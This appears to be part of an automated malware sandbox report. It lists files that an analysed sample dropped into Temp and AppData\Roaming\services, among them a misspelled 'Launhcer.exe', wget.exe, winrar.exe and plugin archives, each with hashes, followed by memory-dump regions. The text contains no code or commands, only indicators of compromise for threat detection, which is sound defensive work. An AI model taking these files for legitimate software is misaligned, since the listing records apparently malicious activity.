883e7a8fc3bef2ab9cff15246fd6bb247987635ad704a3ff4a2b3023cc2df259

SHA512
77a3abbc21856b9142513811f4d9fc7bf842662f97af8ccbdf62c33e8b2a3db48e81e8b4cac34ddabf09080146a74042127b4b3a0df78daea90ecc263ff1f1a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF588.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF59A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
3348707622f8eafa3d458bf9a5b37526

SHA1
fedb6f69908087d005ba0ce2878fdebf7975cff9

SHA256
0782381cc135ffe351131208fee5e9d9c001d8bbe45723bc62d296b609f28f93

SHA512
8b135c301d5192d9592fef3182c812278bbb60b0b7f0bc460f6e3996f94d8f52c16dd68efdec4ffcb51ac21529b3bce360be27efba1f4bc4b4f3605222bab1a7

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
a1441eb61be6bb8df1f1bafe962c71b7

SHA1
1f123ec601528050bdfefc7e677a153660a7584f

SHA256
5ef6b2e1a3d58a2e8d5a64abd9800e509ccfff320d3274cf4d34a6f3e897a7da

SHA512
a3f68bbcb5a7768a2eb6dc7fb5028819d4b2ed325c5e004f51b25ee3ffe4145facd11af96dc46e3e8b6fb251114adca3764d3e275652b23d05721c6bace9a0e0

Download Submit
C:\Users\Admin\AppData\Roaming\services\0127871.rar

Filesize
2.9MB

MD5
3ba7655d55f35256e14307d9ab7f560c

SHA1
b5d14e76f894b643860e69f5a2d9308d4b0c1fcb

SHA256
262bc2b98e4579e3c97376b9f8b7c12f56b0cc75519914057a44b8fc580ded6c

SHA512
a73cda3b1d2cbb1cd7f320ee8b31659d2890a958392ef2ce83eacd320357d095680e160bc25efecd82726d541ce38bdc623a4ee75301fbe76e58b96aaab8dc2b

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins23208.rar

Filesize
9.6MB

MD5
557b45a8dfe391ada925b428815343a7

SHA1
4cee18d01e3a1e3dfbce90a38b9f2687bdb73e90

SHA256
da6879957bd50c9fb45a0bed227f521f2398f65dc1a31904a494ec764d3759d3

SHA512
42efc37605923263fa5a215c645e56fcc998c4ee5a24e3086911e23ba55f90162ec3be5f908e0ac065c697bd5d3dc4aceb460fa4aa19cea9999db2708ba75bbd

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins10863.rar

Filesize
2.9MB

MD5
e8891a8b9d48c36ace38613a3ee58e65

SHA1
45b5010846dc9386c57f6a0f3715af951683b0be

SHA256
64cb56c7af6ec8628a343e0e1d47e52f9353aae5835f243d177577d7a3ccd05c

SHA512
9ec8424ba8d8773d581dd95dc4f70ad9ed529e4640f6061ad8a668966124ee39d734466bf14210d71afdd773c98302e490a47ac89dde1fa6ad1981baf00aa0a4

Download Submit
C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe

Filesize
467KB

MD5
ab2d2914e268ac8754e408bdd6c109cd

SHA1
936a1529158b699ebfaf97e937f17936d321920c

SHA256
0f5978c1e5026feea6e28485ceb99b48105d73a77517faf40c1e57d638a5cdd4

SHA512
c421cb6c41640e1866b891c941151903ad51e04a437b6d90faa6c732f2e98ef4172631453f9a60dcd8c0e4ffd39ec8c13277961c06a4119b10aff91037318fcf

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
3KB

MD5
6cced0a38b185030835bf8857633c159

SHA1
4f1604d5e67894fb6b054f8ac82122fa8ad69ed6

SHA256
f15ae3d7b9d5310f53939148cf8fe58c8078086e934628ad2c3a611a59181e36

SHA512
576c4e937b13050ca408445242db266e43c02dc1ec8ea567994594bd624c276bb20c46b94cf54cfe1ac36091bb4cf9959df1403b4838ab15fa10c75f119e18cc

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
6e7b8b4200d14198c2a6c2c7617a78db

SHA1
b4d87db35a6cb1630a78e50939317f7c68a5303d

SHA256
91436d2eb99775eef9b6e543c089794f851d750924d3aaede3627623fd0a7f2e

SHA512
72aaa8307509aa26782e3954511f0d6306c9cffce312566b91036f173cd763f2d621f907cc3646cb0c0881ef066b7ec10d784eeb4c47c732812bb3eb3ddeb99d

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
\Users\Admin\AppData\Roaming\services\2plugin27724

Filesize
7.2MB

MD5
59dd26d0a0781afb903b222a340a135a

SHA1
dc7eb315e84f9e828376d5421108685d997099aa

SHA256
d782048432be8fe4ce0fbcaaf54724202ac39a293c2a6ae5cda2c7f04aa2c967

SHA512
e4baf948f1023fc04aa9344ed0bde468566a429c4807f584204a6de95113de78dd2faaedad56e064f3023510fe774386a844becd0f9453d53884e31d4b345ed1

Download Submit
\Users\Admin\AppData\Roaming\services\3plugin29563

Filesize
399KB

MD5
5886235e78709ba971a3b4cdfdc336ee

SHA1
856e9688e3e087489d6d4ef02b7317d3cbc1fff7

SHA256
059701aa60117a1adc3c7fbaed00f05e72c97b28bcbd2456805dd6531654d970

SHA512
0699b612c13187f89e71b0008221dddab30c3adaef353c21b40fda72f2487eea874f2475f6e9a9a5a23855f20548dae537fa97fcbeabfc1f266f5219dacdb244

Download Submit
\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
memory/1656-494-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/1676-510-0x0000000003110000-0x0000000003510000-memory.dmp

Filesize
4.0MB

Download
memory/1676-511-0x0000000003110000-0x0000000003510000-memory.dmp

Filesize
4.0MB

Download
memory/1676-512-0x0000000076EF0000-0x0000000077099000-memory.dmp

Filesize
1.7MB

Download
memory/1676-514-0x0000000074BF0000-0x0000000074C37000-memory.dmp

Filesize
284KB

Download
memory/1676-516-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/2088-525-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/2088-522-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/2176-169-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/2240-613-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2240-608-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2240-607-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2240-611-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2240-609-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2240-610-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/2252-603-0x0000000140000000-0x0000000140E3D000-memory.dmp

Filesize
14.2MB

Download
memory/2288-0-0x00000000000B0000-0x00000000000B1000-memory.dmp

Filesize
4KB

Download
memory/2460-577-0x0000000000400000-0x000000000046F000-memory.dmp

Filesize
444KB

Download
memory/2796-606-0x0000000001170000-0x0000000001178000-memory.dmp

Filesize
32KB

Download
memory/2796-605-0x0000000019E30000-0x000000001A112000-memory.dmp

Filesize
2.9MB

Download
memory/2828-554-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/2856-540-0x00000000770A0000-0x00000000770A2000-memory.dmp

Filesize
8KB

Download
memory/2856-544-0x00000000770A0000-0x00000000770A2000-memory.dmp

Filesize
8KB

Download
memory/2856-551-0x0000000140000000-0x0000000140E3D000-memory.dmp

Filesize
14.2MB

Download
memory/2856-542-0x00000000770A0000-0x00000000770A2000-memory.dmp

Filesize
8KB

Download
memory/2856-545-0x00000000770B0000-0x00000000770B2000-memory.dmp

Filesize
8KB

Download
memory/2856-549-0x00000000770B0000-0x00000000770B2000-memory.dmp

Filesize
8KB

Download
memory/2856-547-0x00000000770B0000-0x00000000770B2000-memory.dmp

Filesize
8KB

Download
memory/2868-580-0x0000000000400000-0x000000000046F000-memory.dmp

Filesize
444KB

Download
memory/2892-621-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-616-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-618-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-617-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-629-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-623-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-626-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-627-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-625-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-624-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-615-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-622-0x0000000000300000-0x0000000000320000-memory.dmp

Filesize
128KB

Download
memory/2892-620-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-619-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2892-628-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2964-585-0x000000001B530000-0x000000001B812000-memory.dmp

Filesize
2.9MB

Download
memory/2964-586-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/3068-521-0x0000000074BF0000-0x0000000074C37000-memory.dmp

Filesize
284KB

Download
memory/3068-519-0x0000000076EF0000-0x0000000077099000-memory.dmp

Filesize
1.7MB

Download
memory/3068-518-0x0000000002070000-0x0000000002470000-memory.dmp

Filesize
4.0MB

Download
memory/3068-515-0x0000000000090000-0x0000000000099000-memory.dmp

Filesize
36KB

Download